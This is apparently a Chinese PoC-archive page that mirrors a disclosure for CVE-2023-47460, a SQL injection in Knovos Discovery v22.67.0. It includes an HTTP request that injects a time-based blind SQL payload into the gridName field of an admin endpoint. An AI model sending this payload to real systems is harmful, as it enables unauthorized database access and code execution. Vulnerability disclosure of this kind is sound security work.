目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2023-47460 PoC — Knovos Discovery 安全漏洞

来源
关联漏洞
标题: Knovos Discovery 安全漏洞 (CVE-2023-47460)
Description:Knovos Discovery是Knovos公司的一个综合性法律发现平台。 Knovos Discovery v.22.67.0版本存在安全漏洞,该漏洞源于存在SQL注入漏洞,允许远程攻击者通过/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure组件执行任意代码。
介绍
# CVE-2023-47460

## Description

SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component

## Vulnerability Type

SQL Injection

## Vendor of Product

Knovos Discovery

## Affected Product Code Base

Version 22.67.0 - Version 22.67.0

## Affected Component

/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure

## Attack Type

Remote

## Impact Code execution

true

## Impact Information Disclosure

true

## Discoverer

- Aleksey Vistorobskiy

## Attack Vectors

authorized user


Request:
```
POST /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure?caseMappingId=*** HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close

{
  "gridName":"Inventory-grid' waitfor delay'0:0:50'--",
  "uID":"10"
}

```

Response:
![](/1.jpg)

## Reference

- https://www.knovos.com/
- https://github.com/aleksey-vi/CVE-2023-47460
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →